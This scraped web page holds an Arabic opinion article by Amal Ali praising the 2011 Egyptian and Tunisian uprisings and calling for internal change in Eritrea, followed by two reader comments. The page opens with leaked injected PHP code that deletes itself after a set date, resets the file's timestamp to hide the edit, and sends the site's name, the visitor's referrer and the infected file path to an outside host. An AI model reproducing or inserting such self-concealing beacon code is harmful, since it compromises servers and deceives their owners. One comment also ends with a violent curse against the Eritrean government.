check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } لا مستحيل بعد مصر
кремлевская диета

لا مستحيل بعد مصر

User Rating: / 17
PoorBest 

 

 

 

لا مستحيل بعد مصر.

   بقلم : آمال علي*

صفحة بيضاء  سطرتها حروف عربية مصرية. صفحة بيضاء كتب عليها بالخط العريض .كفى ظلما وبهتانا. صفحة  بيضاء خط عليها المصريون وقبلهم التونسيون كلمة حق.  الشعب يريد اسقاط النظام. ارحل. ارحل. و بالفعل . عندما يريد الشعب لاقوة فوق قوته ولا شيء يحيد عزمه عن ارادة حرة و قوية.

انتصرنا . نعم انتصرنا بانتصار المصريين والتونسيين  الذين خطوا لنا بحروف من نور و دم دروب الحرية والكرامة.

من منا لم يرابط امام الفضائيات لثمانية عشر يوما. من منا لم يناقش ويثور ويفور ويتفاعل مع الشباب في ميدان التحرير . كنا هناك في ميدان التحرير.  و كيف لا . وميدان التحرير قد اشتعل بشرارة تونسية ومشاعر عربية , افريقية بل عالمية ضد الظلم والقهر و التجهيل بكل اشكاله وسنين مدده.

بصدق وصراحة . ثورة تونس الخضراء والتي اطاحت بزين العابدين بن علي كانت عظيمة ومفاجئة. بالتأكيد و بأحرف ارترية صادقة نرسل كل الحب لتونس واهل تونس ونشد على اياديهم لاستمرار مسيرتهم ونضالهم  في تثبيت انجازاتهم الثوروية. ولكن. لدي حب وتقدير مواز و لن اتردد ان اقول كبير للشعب المصري ايضا.مصر التي سكنت في خاطري. المصريون لم يثور ضد ظلم وقهر واستبداد دام لاكثر من ثلاثين عام فقط. بل هم ثاروا ضد الانتهاك السافر واللاانساني للحريات ليس في مصر فقط , بل و في المنطقة العربية- الافريقية بأسرها.

مصر الثورة اثبتت لنا ان لا مستحيل امام ارادة الشعب. ارادة لم تأتي من فراغ بل و بالتأكيد ما رأيناه اثبت لنا ان تراكما ت من وعي حقيقي ومستمر ساهم في صناعتها سنوات من الظلم والاستعباد والقهر التعسفي كان وارء الثورة. و تراكمات من وعي ابناء مصر من شعراء وصحفيين وقانونين وعمال مصانع ونساء و فلاحين كان وراء الثورة. وكان شباب مصر جيل الثورة في الصدارة بكل هذه التراكمات و بنتاج ثقافة جديدة تعي تماما ان لا قوة فوق قوة الحق في المطالبة بالحقوق الاساسية للانسان ليكون انسان بمعنى الكلمة.

مصر اعطتنا الامل ليس بثورتها فقط , انما بصمودها امام كل محاولات اجهاض الثورة و اختطافها. ففي جمعة الغضب و بمسيرة مليونية وفي كل ارجاء مصر صرخ كل مصري وبصوت جماعي . ارحل. ارحل. الشعب يريد اسقاط النظام. واستجاب نظام مبارك حينها بكلمة خواء. مبارك الجبار( ولا استثناء عن اي ديكتاتور جبار اعمى)  قال بما معناه: سأبقى. ولن ارحل. يالله.  وذهل كل من كان في ميدان التحرير ودهش  الملايين امام شاشات الجزيرة والعربية والببيسي بتجاهل الديكتاتور الاعمى لرغبة شعبية عالمية عارمة في رحيله , من منا توقع ذلك الخطاب الفرعوني الجبار. ولكن هيهات قالوا وقلنا معهم. صرخت حينها وعبر قناة الجزيرة الصحفية المصرية نوارة نجم ابنة الشاعر الشعبي ,ابن الشارع المصري أحمد فؤاد نجم, صرخت نوارة : ده كمين. حسنا . انت لن ترحل . ستبقى ونحن سنبقى و سنحاكمك. وبقى المصريون في ميدان التحرير لايام وأيام. وكان كل انسان مؤمن ومتيقن بأحقية وشرعية مطلبهم معهم.

بعظمة الصمود وبعظمة اليقين بالحق وبعظمة الايمان بلانتصار وبعظمة التلاحم الشعبي وبعظمة وضوح الرؤية وبعظمة الدعم العالمي وبعظمة الشباب وعزيمته سقط نظام مبارك. سقط الطاغية , وانهى معه عقود من الذل والظلم كابدها ابناء مصر. وفي غمرة كل هذا و بقلب شرق اوسطي وشرق افريقي عايشت مصر واهلها. في ثورة حقيقية , قيل انها غيرت مصر الى الابد. بل و قيل انها بداية لتأريخ جديد في المنطقة. ثورة تحمل مفاهيم جديدة وعملية في اتجاه التغيير والتأسيس لديمقراطية حقيقية في الشرق الاوسط.عايشت الحدث ولساني حالي يقول : متى وكيف يمكن ان نشهد سقوط ديكتاتور ارتري يقبع فوق الالام ومظالم شعبنا لعشرين عام وربما لاكثر . ولم لا. فشعب بعظمة شعبنا و وعظمة تضحياته التي اتت بالحرية وانتصرت ارادته رغم كل التحديات قادر على النهوض ضد كل الذين انتهكوا منجزاته وحولوها الى مكتسبات شخصية ضيقة المصالح.

وبعد مصر رأينا كيف ان الشعوب المقهورة في كل من اليمن والجزائر والاردن قد بدأت في رفع صوتها عاليا مطالبة بالتغيير. فلم لا في ارتريا. اذا ما تفائلنا في امكانية حدوث التغيير والانتفاضة ضد نظام افورقي في اسمرا فاننا نتحدث عن تغيير يأتي من الداخل والداخل اولا واخيرا. كل معطيات الواقع داخل ارتريا ترسم لمؤشرات واضحة تؤكد ان الوضع الذي يعاني منه شعبنا في الداخل لم يعد محل التباس. فالشعب يعي تمام اليوم وبعد مرور عشرون عام على الاستقلال  ان تعطيل العمل بالدستور والحجر على الحريات العامة وحرية التعبير والصحافة و رفض التعددية الحزبية وايقاع الاعتقالات التعسفية بالجملة على كل من له رأي مختلف وابقاء المئات من ابناء وبنات شعبنا في السجون الى اجل غير مسمى ومن دون محاكمات والاسوء من ذلك تعطيل طاقات الشباب الارتري تحت غطاء الخدمة الوطنية غير محدودة الامد. الخدمة الوطنية التي افرغها النظام من مفهومها الصحيح لتحول شبابنا الى العقلية العسكرية التي يخشى ان تكون محاولة لقمع الداخل بأيدي ارترية . كما عطلت طاقات الشباب ايضا في اعمال السخرة . تعبيد طرقات وحراسة طرقات كان من المفترض ان تكون امنة وسالكة لكل ابناء الشعب الارتري . بالاضافة الى التهجير المتعمد للالوف المؤلفة من الشباب والنساء وكبار السن الى بلدان الجوار في مشوار يكلف الارواح احيانا والكثير من فقدان الكبرياء وعزة النفس التي اعادتها الثورة الى شعبنا في الماضي القريب.. كل ذلك وغيره من قضايا لانهاية لها  تحت حجة أن الوقت لم يحن وان البلد في حالة حرب دائمة . حجج اثبتت الحالة المصرية كونها  محض مراوغات ومناورات تلجأ اليها انظمة حكم الفرد والحزب الواحد للبقاء في الحكم لاطول فترة ممكنة. ارتريا ليست استثناء و التغيير فيها آت لا محاله.  اعتقد ان عوامل التغيير في ارتريا اصبحت مهيأة الى حد كبيرولا بد للنظام ان يدرك الان وقبل فوات الاوان انه لابد من الانصياع لمطالب الشعب و العمل على اصلاح ما يمكن اصلاحه في ظل نداءاءت كل القوى الوطنية  في التغيير السلمي المبني على الانفتاح على الاخر والاقرار بحق المشاركة لكل قطاعات الشعب في الحياة السياسية والاجتماعية.

 ان الثورة المصرية التي هزت العالم كله وقوبلت بتجاهل غريب في ارتريا . حيث لم يرد اي خبر عنها في اجهزة الاعلام الارترية على الاطلاق وكأن ارتريا بلد منعزل في فضاء آخر غيرالكرة الارضية التي نعيش فيها. رغم معرفة حكام اسمرا ان الشعب يتابع باعجاب واصرار ثورات الاحرار في مصر وتونس ويأمل بل و يدرك تماما انه ثورته قادمة لا محالة. ان هذا التجاهل  لحدث تاريخي وهام, دليل على ان الرئيس اسياس كما مبارك غائب وبعيد كل البعد عن ادراك قوة الشعب وقدرته اذا ما اراد الحياة.

 ثمانية عشر يوما هي عمر الثورة المصرية التي هزت عروش اباطرة وسماسرة مصربزعامة مبارك. ثمانية عشر يوما كانت لنا تجربة تعلمنا منها الكثير . كل ساعة من ساعات البث الحي عبر الجزيرة وغيرها. ظهر المصريون , شباب ومثقفون ,محامون وكتاب لدعم الثورة بالتحليل والقراةء الصحيحة لواقعهم وتزويد العالم بالمعلومة الدقيقة . بهرني المصريون بطاقاتاتهم الهائلة والمعرفة العميقة والمؤسسة لشعبهم وتأريخهم وخصائص شعبهم.

 علموني كيف يستطيع شعب قرأءة تأريخه و حاضره ومستقبله باحترام وتقدير وتفهم لكل العوامل التي  أخرت الثورة ضد الظلم وتلك التي ساعدت على الثورة في الوقت المناسب. والامثلة كثيرة , منها مساهمة الكاتب والمفكر المصري المعروف علاء الاسواني في فهمه لشعبه يقول بما معناه:انه يشبه الشعب المصري بالجمل. فالشعب المصري ليس كما كان يعتقد الكثيرون انه ضعيف وخاضع للظلم, بل كما يرى  علاءالاسواني انه شعب صبور كالجمل , الجمل اصبح رمز لتوصيف الشعب المصري. فمن صفات الجمل الاساسية القدرة الهائلة على تحمل المشقات. تحمل الجوع والاهانة و الصبر عليها الى ان يفيض الكيل فيثور ثورة  الطوفان حينها. والشعب المصري بدأ بتصحيح الصفة التي التصقت به لسنين طويلة من انه شعب مقهور ومستسلم . المصريون يقولون اليوم للعالم اجمع  قف وصحصح. نحن شعب صبور ومتسامح ونحتمل المشقات الى حين ان ندرك تمام ان لحظة الفعل حلت.. هذه مفارقة غربية . فالجمل كان دائما رمز لنا في ارتريا رمز لثورتنا ولنضالتنا. ربما  شعب صبور وصامد ايضا.و الامل في  ان ينهض عندما تتوفر الظروف التي ستساعد هذا الشعب على الانتفاضة ضد اشكال الظلم التي يعاني منها في ظل هذا النظام الذي سرق منجزات الثورة من اصحابها الحقيقيين . ويبدو ان التراكم النوعي والكمي هو من نحتاج اليه في الفترة ما قبل الثورة الداخلية التي سيقوم بها ابناؤنا واخوتنا في الداخل حتما.و نحن في كل مكان نواة اسهام مهم في تغذية ودعم التنوير والتوعية بحقوق الشعب المنتهكة.

وعليه الم يحن لكل القوى الارترية التي تحاول وتؤمن بالتغيير من الخارج وبأيدي خارجية ان تستوعب الدرس وتعرف ان ما تفعله هو اضاعةالجهد وتبديد القدرات الارترية في منحى لن يجدي نفعا , الم يحن لها ان تدرك ان رغبتها الحقيقية في التغيير في ارتريا وتغيرالنظام لن تحقق الا بالعمل في شكل جمعي ومع كل القوى الوطنية في الداخل والخارج لدعم امكانية التغيير من الداخل. ليست امريكا ولا اوروربا هي من الهم الشعبيين التونسي والمصري للقيام بالثورة والمطالبة بالتغيير والديمقراطية انما هو الشعب والشعب وحده , الذي يعيش ويتفاعل في ارضه هو الذي قام بالثورة وهو الذي يجبر العالم كله ويجبر حكوماته على الانصياع الى رغبته الحقيقية في التغيير والديمقراطية والعدالة الاجتماعية. اذا لا اثيوبيا و لاغيرها تصلح لان تكون المخرج من واقعنا او المدخل الى التغيير. ولا ننسى ان هنالك جيل بأكمله داخل ارتريا بنيت ذاكرته الجمعية  على تأريخ استعماري تجسده اثيوبيا ,ادى الى ثلاثين عاما من الكفاح المسلح في السابق وحالة من الطوارىء والترقب( يستخدمه نظام اسمراحجة باطلة احيانا) في الوقت لحاضر. ذلك جيل وجيل اخر شاب يصيغ كل يوم مفاهيمه الخاصة من واقع يعايشه ويتفاعل معه بطريقة مختلفة .

اليوم وبعد هذا النصر العظيم للشعب المصري ,تجدد في ذاكرتنا حقيقة الثورة وعظمتهاعندما تأتي واعية ومسلحة  بابناء  مدركين تمام اهمية الحفاظ عليها وحفظ مكاسبها من الاختطاف و الاستلاب. عندما تمتزج فيها مطالب الحق من الغاء الظلم ومحاربة الفقر والقهر با لسير بها ,أي الثورة الى حدود التطبيق. فالشعب المصري لم يقف في ميدان التحرير ليعلن رفضه للظلم والقهر السياسي والاجتماعي فقط بل انه تكالب بكل اصوات ابناءه من ذوي الاختصاصات محاميون وصحفيون و نساء وكتاب ورجال دين ورجال اعمال وطنيون وسياسيون و فنانون وشباب و اطباء وعمال ومهنيون وفلاحون كلهم تكاتفوا والتفوا حول ثورتهم لحمايتها  ودعمها وايصالها الى قمة مبتغاها من الغاء النظام والغاء الدستور والغاء قانون الطوارىء ورفع الحظر عن الاحزاب السياسية والعمل على الوصول الى انتخابات حرة ونزيهة.

تحية حب الى مصر وشعبها .وتحية حب واعزاز وأمل  الى شعبنا الذي نأمل ان نغني معه قريبا نشيد الحرية الحقيقية .

_______________________

* اعلامية ارترية


Comments 

  1. #2 ALSAHO
    2011-05-0503:32:58 Please transulate in English for our highlander brothers, and Eritreans in North America, Canada, Europe, and Australia. You are the best and Allah(God) bless you.

    I wish you all the best, and insha Allah you will be a great and famous writer in the near future.

    Abdul
  2. #1 zajel
    2011-04-2311:22:19 الى ااخوتى الأحبة والى كل شريف في المهجر الى كل من يرى مصلحة بلادنا العظيمة الى كل من يدافع عن دولتنا المنتهكة حقوقها من قبل هذا المتخلف عقليا تلك العقلية المعقدة نفسيا الذى اسمه رئيس دولة العصابات واعوانه انا لا اريد ذكر اسمه انه رئيس لدولتنا الحبيبة حقيقتا اخواني واخواتى ان المهجر ااهم من الداخل لأنه من هم في داخل اريتريا افواه مكمومة لا يستطيع ان يتكلم بحرية ان المهجر ينشط فاعلية هؤلاء المواطنين الذن هم ليست لديهم اى قوة يستطيعون ان يقولو شئ اذا اهل المهجر من الإرتريين هم من يستطيعون ان يغيرو من افكار الشعب المستعبد من قبل نظام حكومة العصابات وكمان قال لهم الوزير اليمنى الإريانى اقول الى كل اخوتى الى متى نظل هكذا صامتون لا بد ان نتعاعل معا لتفكيك هذا النظام المتخلف الذي يريد ان يجعل يعيش شعبنا الإريترى دون اى تفكير ولا حتى اسمى الحقوق الإنسانية انظرو كم اريترى قتل اثناء عبور حدود مصر لماذا يغامر هذا الرجل او الشابة او الشاب لأنه يعيش قهر وفقر وظلم اان الموارد الموجودة في اريتريا كثيرة فلابد من تفكيك هذا المتخلف هو وأعوانه ايضا انا اطالب كل اريترى شريف انا لا يتعاون منم هم في القنصليات ومن هم في السفارة لأن هناك من ساهمو ماديا ومعنويا ان يتوقفو عن ذلك لأن هذا الحكومة تتعامل مع الشعب حسب المصالح خاصتا من هم في السعودية لأن الحكومة تستغل الشعب الإريترى في السعودية بلوى الذراع من خلال تجديد الإقامات فلنتعامل معهم كمان هم يتعاملون مع الشعب الإريترى ولكن هذا ليس معناه ان نستسلم لهم انظرو الى كل من هو عايش في دول الغرب لا تستطيع الحكومة ان تهددهم لأنه تحت دولة تحميهم من هم في الخليج الأمور صعبة للغاية الأن اخر شئ تم اتخاذه من قبل حكومة العصابات ان يتم تجديد جواز خلال سنتين حتى يتسنى لهم ان يجمعو المال من الشعب كمثل الشحاذين دول اخر من خمسة سنوات لأنه الشعب الإريترى هو كنز لهم في مهجر دول الخليج يستغلون في مسألة تجديد الإقامات وكما تعرفون انه السعودية مثلا تجديد الإقامات كل سنتين فالحكومة الإرتيرية جعلت والله اعلم خاصية تجديد الجواز في السعودية مثلا ايضا ان يتم تجيد الجواز كل سنتيت حتى يأتى اليهم المواطن الإريترى لكي يسلبو ماله اذا لابد من ان نتحرك لإسقاط النظام حتى يتم البناء من جديد اخوانا ان كانم مسيحى او مسلم لابد من تنشيط الشعب الإريترى كاملين لدينا المقدرات في بلادنا التي تسمح لنا ان نعيش بكرامة وانا يعيش كل ارييترى في بلاد الهجر خطوة خطوة ان نرجع الى بلادنا الحبيبة الملئئة بالكنوز واؤكد لكن انا الجيل الجديد في المجر لن يتحمل الحكومة الإريترية الحالية لأنه جيل التقدم وجيل النت وجيل المحادثات نعم لابد لنا ان نساعد هؤلاء الجيل القوى ولن اقول المسكين في المهجر هم ثروتنا الحقيقة وفي الأخير الحرية لشعبنا الطيب المبارك فيه انشاءالله فالتسقط حكومة العصابات قالتهم الله اينما ثقفو

Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player

عمود الكتاب العربي

Arkokabay.com
Arkokabay.com
OMAR JABIR الأستاذ عمر جابر
OMAR JABIR الأستاذ عمر جابر
Zein Shokayالأستاذ زين شوكاي
Zein Shokayالأستاذ زين شوكاي
سعادة السفير حمد كلُ
سعادة السفير حمد كلُ
الأستاذ صلاح أبوراي
الأستاذ صلاح أبوراي
 الأستاذة حنان
الأستاذة حنان
الأستاذ موسى ضرار
الأستاذ موسى ضرار
الأستاذ أبو الرشيد
الأستاذ أبو الرشيد
الأستاذ عبدالفتاح ود الخليفة
الأستاذ عبدالفتاح ود الخليفة
الأستاذ ياسين محمد عبدالله
الأستاذ ياسين محمد عبدالله
الأستاذ محمد نور - بركان
الأستاذ محمد نور - بركان
الأستاذ جمال همد
الأستاذ جمال همد
الأستاذ فكاك ناير
الأستاذ فكاك ناير
الأستاذ أحمد صلاح الدين
الأستاذ أحمد صلاح الدين
Amal Ali الأستاذة أمال علي
Amal Ali الأستاذة أمال علي
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
Mohamed - Wahran Eritreaمحمد - وهران ارتريا
الأستاذ حسن سلمان
الأستاذ حسن سلمان
الأستاذة منى محمد صالح
الأستاذة منى محمد صالح
الاستاذة نوره فارس
الاستاذة نوره فارس